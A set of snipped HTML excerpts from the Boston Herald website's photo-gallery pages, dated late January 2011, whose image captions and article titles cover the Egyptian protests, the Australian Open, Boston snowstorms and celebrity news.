<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/international/africa/view.bg?articleid=1312587&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/af3958_Drumgold_01282011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/regional/view.bg?articleid=1312509&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/85bc2c_bill_01282011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/sports/football/patriots/view.bg?articleid=1312539&format=comments">
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110127/stp/a37654_sheen_01282011.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/track/inside_track/view.bg?articleid=1312537&format=comments">
...[SNIP]...
<a id="trackMainImage_href" href="/entertainment/arts_culture/view.bg?articleid=1312707">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/8df24f_Spidey_01292011.jpg" title="WEB OF WOES: The highly expensive Broadway musical ‘Spider-Man Turn: Off the Dark’ has been the victim of bad press, according to director Julie Taymor." alt="WEB OF WOES: The highly expensive Broadway musical ‘Spider-Man Turn: Off the Dark’ has been the victim of bad press, according to director Julie Taymor.">
</a>
...[SNIP]...
tle="$65-million ‘Spider-Man’ leaves Broadway hanging"
onclick="switchPhoto('198237');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198237" src="http://multimedia.heraldinteractive.com/images/20110128/stp/8df24f_Spidey_01292011.jpg" title="WEB OF WOES: The highly expensive Broadway musical ‘Spider-Man Turn: Off the Dark’ has been the victim of bad press, according to director Julie Taymor."
alt="AP file" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1312633" title="Egyptian President Mubarak asks Cabinet to resign"
onclick="switchPhoto('198188');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198188" src="http://multimedia.heraldinteractive.com/images/20110128/stp/2784d0_ltpwatercannon.jpg" title="An Egyptian protester flashes Egypt’s flag as anti-riot policemen use water canon against protesters in Cairo, Egypt today. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1312633" title="Egyptian President Mubarak asks Cabinet to resign"
onclick="switchPhoto('198230');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198230" src="http://multimedia.heraldinteractive.com/images/20110128/stp/097956_ltpEgyptC012811.jpg" title="An anti-government protester burns furniture outside of a looted building, near Tahrir Square, in Cairo, Egypt, Friday, Jan. 28, 2011."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1312633" title="Egyptian President Mubarak asks Cabinet to resign"
onclick="switchPhoto('198229');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198229" src="http://multimedia.heraldinteractive.com/images/20110128/stp/fcc2bd_ltpEgyptB012811.jpg" title="An Egyptian anti-government activist kisses a riot police officer following clashes in Cairo, Egypt, Friday, Jan. 28, 2011."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1312633" title="Egyptian President Mubarak asks Cabinet to resign"
onclick="switchPhoto('198228');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198228" src="http://multimedia.heraldinteractive.com/images/20110128/stp/3a7450_ltpProtestEgypt012811.jpg" title="An Egyptian Army armored personnel carrier is surrounded by anti-government protesters near Tahrir square in downtown Cairo, Egypt, Friday, Jan. 28, 2011."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1312633" title="Egyptian President Mubarak asks Cabinet to resign"
onclick="switchPhoto('198195');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198195" src="http://multimedia.heraldinteractive.com/images/20110128/stp/7def3f_ltpprotesters.jpg" title="Egyptian anti-government activists run for a cover from the tear gas during clashes with the riot- police in Cairo, Egypt today. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
title="President Obama tells Mubarak: Must take ‘concrete steps"
onclick="switchPhoto('198235');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198235" src="http://multimedia.heraldinteractive.com/images/20110128/stp/de6466_Obama_01292011.jpg" title="LEAD BY EXAMPLE: President Barack Obama speaks to reporters about the recent developments in Egypt Friday in the State Dining Room of the White House."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
ticleid=1312661" title="China celebrates, Li Na elated to be in final"
onclick="switchPhoto('198219');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198219" src="http://multimedia.heraldinteractive.com/images/20110128/stp/d85cb2_ltpLiNa012811.jpg" title="China’s Li Na addresses reporters at a press conference at the Australian Open tennis championships in Melbourne, Australia, Friday, Jan. 28, 2011."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
ticleid=1312661" title="China celebrates, Li Na elated to be in final"
onclick="switchPhoto('198220');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198220" src="http://multimedia.heraldinteractive.com/images/20110128/stp/e84f15_ltpDulko012811.jpg" title="Argentina’s Gisela Dulko, left, and Italy’s Flavia Pennetta, right, hold the trophy after beating Victoria Azarenka of Belarus and Russia’s Maria Kirilenko in their women’s doubles final at the Australian Open in Melbourne, Austral"
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
ticleid=1312661" title="China celebrates, Li Na elated to be in final"
onclick="switchPhoto('198221');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198221" src="http://multimedia.heraldinteractive.com/images/20110128/stp/598de2_ltpFerrer012811.jpg" title="Spain’s David Ferrer hits a return to compatriot Rafael Nadal during their quarterfinal match at the Australian Open tennis championships in Melbourne, Australia, Wednesday, Jan. 26, 2011."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
cleid=1312652" title="Afghan police: 8 die in Kabul supermarket blast"
onclick="switchPhoto('198203');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198203" src="http://multimedia.heraldinteractive.com/images/20110128/stp/eb36a1_ltpKabul012811.jpg" title="A man runs through a burning supermarket Friday, Jan. 28, 2011 in central Kabul, Afghanistan."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
cleid=1312609" title="Murray beats Ferrer, into Australian Open final"
onclick="switchPhoto('198179');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198179" src="http://multimedia.heraldinteractive.com/images/20110128/stp/a4c7ad_amurray012811.jpg" title="Britain’s Andy Murray makes a backhand a return to Spain’s David Ferrer during the men’s semifinal at the Australian Open tennis championships in Melbourne, Australia, Friday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1312587" title="Egyptian Nobel laureate ElBaradei in house arrest"
onclick="switchPhoto('198170');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198170" src="http://multimedia.heraldinteractive.com/images/20110128/stp/418079_egypt012811.jpg" title="Former Director General of the International Atomic Energy Agency, IAEA, and Nobel Peace Prize winner Mohamed ElBaradei talks to members of the media as he arrives at Cairo’s airport in Egypt, from Austria, Thursday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
le="Tracked Down: Deion Branch, Jarvis Green, Kevin Faulk and more..."
onclick="switchPhoto('198089');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198089" src="http://multimedia.heraldinteractive.com/images/20110127/stp/5e8b2b_ben_01282011.jpg" title="Former Patriots defensive end Jarvis Green celebrates
his birthday with a cake replica of Gillette Stadium."
alt="Micaila’s Creations" style="margin:0 2px" />
</a>
...[SNIP]...
e="We Hear: Mitt Romney, David Letterman, Andrew Weisblum and more..."
onclick="switchPhoto('198099');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198099" src="http://multimedia.heraldinteractive.com/images/20110127/stp/5eb1a6_mitt_01282011.jpg" title="Mitt Romney."
alt="Angela Rowlings" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1312552" title="Another winter wallop batters Boston"
onclick="switchPhoto('198098');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198098" src="http://multimedia.heraldinteractive.com/images/20110127/stp/3057c6_Plow_01282011.jpg" title="PILING UP: Crews work to clear mounds of snow in Kenmore Square yesterday."
alt="Mark Garfinkel" style="margin:0 2px" />
</a>
...[SNIP]...
icleid=1312550" title="Moore’s the merrier at Hasty festivities"
onclick="switchPhoto('198088');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198088" src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" title="Harvard’s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character."
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
leid=1312545" title="Disabled resident tells city: Tap kids to shovel"
onclick="switchPhoto('198097');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198097" src="http://multimedia.heraldinteractive.com/images/20110127/stp/817069_Snowride_01282011.jpg" title="STUCK: Terri Farrell tries to navigate in her scooter along L Street in South Boston. She says she’s been forced to stay home because of all the snow."
alt="Angela Rowlings" style="margin:0 2px" />
</a>
...[SNIP]...
icleid=1312539" title="Bill Belichick marks Patriots’ milestone"
onclick="switchPhoto('198109');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198109" src="http://multimedia.heraldinteractive.com/images/20110128/stp/85bc2c_bill_01282011.jpg" title="
BELICHICK: Proud of what Pats have done under his watch.

"
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
537" title="Hernia sends hearty partier Charlie Sheen to the hospital"
onclick="switchPhoto('198090');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198090" src="http://multimedia.heraldinteractive.com/images/20110127/stp/a37654_sheen_01282011.jpg" title="Charlie Sheen."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
516" title="Man in collapse: ‘God was looking out for us’"
onclick="switchPhoto('198096');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198096" src="http://multimedia.heraldinteractive.com/images/20110127/stp/ada04c_Collapse_01282011.jpg" title="FALLING DOWN: Rescue workers are at the scene where two drivers were trapped in a roof collapse in Lynn yesterday."
alt="Mark Garfinkel" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198205');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198205" src="http://multimedia.heraldinteractive.com/images/20110128/stp/c1e423_ltpSteam012811.jpg" title="BACK UP: Reporter Josh Walovitch gets exfoliated with <i>venik,</i> a bundle of birch and twigs."
alt="Patrick Whittemore" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198204');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198204" src="http://multimedia.heraldinteractive.com/images/20110128/stp/2597e5_ltpBikramA012811.jpg" title="GET BENT: Bikram yoga offers 105-degree temps and 90 minutes of hard-core exercise and stretching."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198105');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198105" src="http://multimedia.heraldinteractive.com/images/20110128/stp/164330_Hot_01282011.jpg" title="FUELING FLAMES: Maura Tucker and Mark Dunn enjoy cocoa and cookies by the fireplace at UpStairs on the Square in Cambridge this week."
alt="Ted Fitzgerald" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198197');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198197" src="http://multimedia.heraldinteractive.com/images/20110128/stp/288822_ltpManicure012811.jpg" title="DIGITAL AGE: Your hands will be in tip-top shape after a hot cream manicure at Bliss Spa at the W Hotel."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198196');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198196" src="http://multimedia.heraldinteractive.com/images/20110128/stp/6819c5_ltpYogaA012811.jpg" title="GET BENT: Bikram yoga offers 105-degree temps and 90 minutes of hard-core exercise and stretching."
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198210');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198210" src="http://multimedia.heraldinteractive.com/images/20110128/stp/09191d_ltpChromeo012711.jpg" title="Chromeo"
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198208');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198208" src="http://multimedia.heraldinteractive.com/images/20110128/stp/9ff7e8_ltpBadrabbits012711.jpg" title="Bad Rabbits"
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198207');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198207" src="http://multimedia.heraldinteractive.com/images/20110128/stp/afacc0_ltpOMD012711.jpg" title="Orchestral Manoeuvres in the Dark"
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1312514" title="Ways to take the chill out of winter"
onclick="switchPhoto('198206');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198206" src="http://multimedia.heraldinteractive.com/images/20110128/stp/8a420e_ltpSteamB012811.jpg" title="Reporter Josh Walovitch, right, chats with Marin McNulty before getting exfoliated."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
?articleid=1312509" title="Cops arrest Shawn Drumgold on drug charges"
onclick="switchPhoto('198091');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198091" src="http://multimedia.heraldinteractive.com/images/20110127/stp/af3958_Drumgold_01282011.jpg" title="Shawn Drumgold"
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
sketball/view.bg?articleid=1312503" title="Seminoles wear down Eagles"
onclick="switchPhoto('198114');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198114" src="http://multimedia.heraldinteractive.com/images/20110128/stp/550ed9_BC_01282011.jpg" title="CAN’T TAKE IT AWAY: Boston College’s Kristen Doherty (left) and Carolyn Swords surround Florida State’s Chasity Clayton during the Eagles’ 102-93 loss last night."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
le="Snow business cancels Julianne Moore’s Hasty Pudding outing"
onclick="switchPhoto('198084');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198084" src="http://multimedia.heraldinteractive.com/images/20110127/stp/33907a_moore_01282011.jpg" title="Julianne Moore hams it up with Harvard’s Hasty Pudding Theatrical crew in drag as she receives the 2011 Woman of the Year award at Harvard."
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
.bg?articleid=1312479" title="Senior Bowl LBs overcame serious scares"
onclick="switchPhoto('198082');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198082" src="http://multimedia.heraldinteractive.com/images/20110127/stp/6a0551_ltpherzlich.jpg" title="North squad’s Mark Herzlich of Boston College, talks with scouts following Senior Bowl NCAA college football practice in Mobile, Ala. yesterday. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
articleid=1312394" title="Ravens’ Ed Reed remembers his brother"
onclick="switchPhoto('198025');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198025" src="http://multimedia.heraldinteractive.com/images/20110127/stp/e15182_ereed012711.jpg" title="Ravens player Ed Reed speaks at a news conference about the apparent recovery of his brother’s body from the Mississippi River, at the St. Charles Parish Sheriff headquarters in Luling, La., Wednesday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
articleid=1312387" title="Fast storm collapses roof; city towing cars"
onclick="switchPhoto('198067');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198067" src="http://multimedia.heraldinteractive.com/images/20110127/stp/e017a9_ltp012711collapsemg07.jpg" title="Officials stand by during the rescue of two men from a roof collapse in Lynn this morning."
alt="Mark Garfinkel" style="margin:0 2px" />
</a>
...[SNIP]...
articleid=1312387" title="Fast storm collapses roof; city towing cars"
onclick="switchPhoto('198049');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198049" src="http://multimedia.heraldinteractive.com/images/20110127/stp/edc277_ltpLynncar012711.jpg" title="A car where two workers were buried inside of is seen in Lynn this morning. Rescue personnel successfully rescued the occupants, who sustained minor injuries."
alt="Mark Garfinkel" style="margin:0 2px" />
</a>
...[SNIP]...
cleid=1312351" title="Harrison Barnes lifts North Carolina past Miami"
onclick="switchPhoto('197996');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197996" src="http://multimedia.heraldinteractive.com/images/20110127/stp/e8e0fe_hbarnes012711.jpg" title="North Carolina’s Harrison Barnes (40) shoots as Miami’s Reggie Johnson (42) defends in the first half of an NCAA college basketball game in Coral Gables, Fla., Wednesday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1312346" title="Snowstorm wallops Northeast, piling on the misery"
onclick="switchPhoto('197992');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197992" src="http://multimedia.heraldinteractive.com/images/20110127/stp/cf9ea2_weather012711.jpg" title="This NOAA satellite image taken Thursday, Jan. 27, 2011 at 12:45 a.m. EST shows comma shaped cloud cover over New England and the western Atlantic Ocean as a strong winter storms brings significant snowfall and strong winds to New England. "
alt="Weather Underground/AP" style="margin:0 2px" />
</a>
...[SNIP]...
articleid=1312330" title="Turnaround by Tim Thomas a Bruins highlight"
onclick="switchPhoto('198039');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198039" src="http://multimedia.heraldinteractive.com/images/20110127/stp/c3e090_ltpThomasgoalie012711.jpg" title="Bruins goalie Tim Thomas makes a stop in the second period."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
le="We Hear: Kenny Chesney, Natalie Jacobson, Kate Bosworth & more..."
onclick="switchPhoto('198022');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198022" src="http://multimedia.heraldinteractive.com/images/20110127/stp/df859e_kchesney012711.jpg" title="Kenny Chesney."
alt="AP (File)" style="margin:0 2px" />
</a>
...[SNIP]...
le="Tracked Down: Shaquille O’Neal, F. Murray Abraham & more..."
onclick="switchPhoto('197945');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197945" src="http://multimedia.heraldinteractive.com/images/20110126/stp/5ffe30_Shaq_01272011.jpg" title="Tom O’Brien and Tanner Webb with Shaquille O’Neal."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
view.bg?articleid=1312304" title="Enhancing the magic on land and sea"
onclick="switchPhoto('197966');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197966" src="http://multimedia.heraldinteractive.com/images/20110127/stp/f64e50_mick_01272011.jpg" title="IT’S A SMALL WORLD: Mickey and Minnie welcome the Disney Dream at Port Canaveral, Fla., earlier this month."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
leid=1312240" title="NJ man says he killed UK tourist in self-defense"
onclick="switchPhoto('197896');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197896" src="http://multimedia.heraldinteractive.com/images/20110126/stp/e03fb8_davies_01262011.jpg" title="Robert Davies, stands in the Atlantic County Criminal Courthouse in Mays Landing, N.J. Davies admitted Wednesday Jan. 26, 2011 that he killed Lavern Paul Ritch, one of Britain’s most eligible bachelors more than three years ago."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1312225" title="Tiger Woods looks for fresh start at Torrey Pines"
onclick="switchPhoto('197889');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197889" src="http://multimedia.heraldinteractive.com/images/20110126/stp/281a03_tiger.jpg" title="Tiger Woods listens to a question during a news conference at the Farmers Insurance Open golf tournament in San Diego, Wednesday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
articleid=1312123" title="Memorial at site of Auschwitz oven builders"
onclick="switchPhoto('197838');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197838" src="http://multimedia.heraldinteractive.com/images/20110126/stp/23a3a4_ltpHolocaustmemorial012611.jpg" title="A man stands in the exhibition ‘The Engineers of the ’Final Solution’ Topf & Sons - Builders of the Auschwitz Ovens’ after a press conference in Erfurt, central Germany, on Tuesday, Jan. 25, 2011."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
view.bg?articleid=1312089" title="J.D. Salinger secrets remain secret"
onclick="switchPhoto('197799');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197799" src="http://multimedia.heraldinteractive.com/images/20110126/stp/283152_jdsalinger012611.jpg" title="In this Jan. 28, 2010 file photo, copies of J.D. Salinger’s classic novel ‘The Catcher in the Rye’ are seen at the Orange Public Library in Orange Village, Ohio."
alt="AP (File)" style="margin:0 2px" />
</a>
...[SNIP]...
id=1312082" title="Friends: Ore. officer shooting suspect is paranoid"
onclick="switchPhoto('197785');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197785" src="http://multimedia.heraldinteractive.com/images/20110126/stp/9c40d7_swat012611.jpg" title="Oregon State Police Swat members climb out of a armored vehicle during a search of a home in the Bayshore community Tuesday in Waldport , Ore. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
e="Tracked Down: Chris Lambton, Robert Plant, Jordan Knight & more..."
onclick="switchPhoto('197742');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197742" src="http://multimedia.heraldinteractive.com/images/20110125/stp/e312f8_Lamb_01272011.jpg" title="‘The Bachelorette’ wash-outs Chris Lambton and Kasey Kahl at the Celtics-Cavs game."
alt="Matthew West" style="margin:0 2px" />
</a>
...[SNIP]...
articleid=1312053" title="FACT CHECK: Obama and his imbalanced ledger"
onclick="switchPhoto('197739');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197739" src="http://multimedia.heraldinteractive.com/images/20110125/stp/bf8b87_Bohener_01272011.jpg" title="House Speaker John Boehner watches as President Barack Obama delivers his State of the Union address on Capitol Hill."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
business/general/view.bg?articleid=1312013" title="Heating costs soar"
onclick="switchPhoto('197749');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197749" src="http://multimedia.heraldinteractive.com/images/20110126/stp/898a0e_heat_01262011.jpg" title="FILLING UP THE TANKS: Harry Allen, owner of Arlmont Fuel Corp., pulls the hose from his truck while making an oil delivery in Arlington."
alt="Stuart Cahill" style="margin:0 2px" />
</a>
...[SNIP]...
</b> President Obama’s State of Union address"
onclick="switchPhoto('197734');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197734" src="http://multimedia.heraldinteractive.com/images/20110125/stp/351973_SOTU_01262011.jpg" title="President Obama arrives at the podium just prior to delivering his State of the Union address as Vice President Joe Biden and House Speaker John Boehner applaud."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
ew.bg?articleid=1311916" title="Japan, Australia into Asian Cup final"
onclick="switchPhoto('197683');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197683" src="http://multimedia.heraldinteractive.com/images/20110125/stp/7f3550_asia.jpg" title="Australia’s players celebrate at the end of their 2011 Asian Cup semi-final football match against Uzbekistan in the Qatari capital Doha on January 25, 2011. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
ticleid=1311847" title="List of 83rd annual Academy Award nominations"
onclick="switchPhoto('197712');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197712" src="http://multimedia.heraldinteractive.com/images/20110125/stp/574dff_ltptfighter.jpg" title="Christian Bale and Mark Wahlberg, right, appear in “The Fighter.” The Lowell-based flick was nominated for 7 Academy Awards, including best picture, and Bale for best supporting actor. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
806" title="Girl killed in Wash. state shootout may have been runaway"
onclick="switchPhoto('197613');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197613" src="http://multimedia.heraldinteractive.com/images/20110125/stp/f1a78a_shooting012511.jpg" title="Sarah Bastura, of Port Orchard, Wash., left, lights a candle for the four people who were shot Sunday in front of a Walmart store in Port Orchard, Monday."
alt="Ellen M. Banner/The Seattle Times" style="margin:0 2px" />
</a>
...[SNIP]...
?articleid=1311804" title="A Twitter apology for the former Mrs. Shaq"
onclick="switchPhoto('197624');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197624" src="http://multimedia.heraldinteractive.com/images/20110125/stp/b68d99_oneals012511.jpg" title="Va’Shaundya (Shaunie) and Shaquille O’Neal in happier times."
alt="AP (File)" style="margin:0 2px" />
</a>
...[SNIP]...
11803" title="We Hear: Jay Leno, Josh Beckett, Zona Jones and more..."
onclick="switchPhoto('197606');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197606" src="http://multimedia.heraldinteractive.com/images/20110125/stp/d33d45_jayl_01252011.jpg" title="Jay Leno"
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
al/view.bg?articleid=1311802" title="Water pipe break routs residents"
onclick="switchPhoto('197594');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197594" src="http://multimedia.heraldinteractive.com/images/20110125/stp/a3a915_evac_01252011.jpg" title="Residents of 660 Washington Street (The Archstone Building) in Downtown Crossing were evacuated due to a water main break in their building."
alt="Matthew West" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1311794" title="Homeless woman shuns shelter as temps turn deadly"
onclick="switchPhoto('197569');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197569" src="http://multimedia.heraldinteractive.com/images/20110124/stp/a26b54_home_01252011.jpg" title="Susan Bakerjones, a homeless woman who refuses to seek a shelter, lives in a tent year round, even when it is bitter cold. "
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1311794" title="Homeless woman shuns shelter as temps turn deadly"
onclick="switchPhoto('197654');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197654" src="http://multimedia.heraldinteractive.com/images/20110125/stp/0f1e24_ltp012411homelessms01.jpg" title=" Susan Bakerjones, a homeless woman who refuses to seek a shelter, looks out from the tent she calls home during Monday’s bitter cold. "
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
icleid=1311790" title="At least Tom Brady still wins the hearts of GQ"
onclick="switchPhoto('197574');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197574" src="http://multimedia.heraldinteractive.com/images/20110124/stp/147606_brady_01252011.jpg" title="Tom Brady cradles a baby goat in a 2005 GQ spread."
alt="GQ" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1311785" title="‘Idol’ hopeful’s Pop a Hub fave"
onclick="switchPhoto('197572');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197572" src="http://multimedia.heraldinteractive.com/images/20110124/stp/1de6a0_idol_01252011.jpg" title="‘American Idol’ hopeful Ashley Sullivan of
Tewksbury poses prior to performing for the judges."
alt="Michael Becker/Fox/ Picture Group Photo" style="margin:0 2px" />
</a>
...[SNIP]...
television/reviews/view.bg?articleid=1311761" title="Mommie dreariest"
onclick="switchPhoto('197591');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197591" src="http://multimedia.heraldinteractive.com/images/20110125/stp/f53a13_rivers_01252011.jpg" title="GENERATION GAP: Joan and Melissa Rivers clash in ‘Joan & Melissa: Joan Knows Best?,’
their new unscripted series premiering tonight on WE tv."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1311749" title="Cumberland Farms testing drive-thru grocery store"
onclick="switchPhoto('197579');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197579" src="http://multimedia.heraldinteractive.com/images/20110125/stp/8961d4_cumb_01252011.jpg" title="HAND IT TO THEM: Cumberland Farms is testing a drive-thru window at its store in Kingston — the first of its kind in New England — where all items are
available to customers who never have to leave their cars."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
id=1311718" title="NFL will close Cowboys Stadium roof for Super Bowl"
onclick="switchPhoto('197557');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
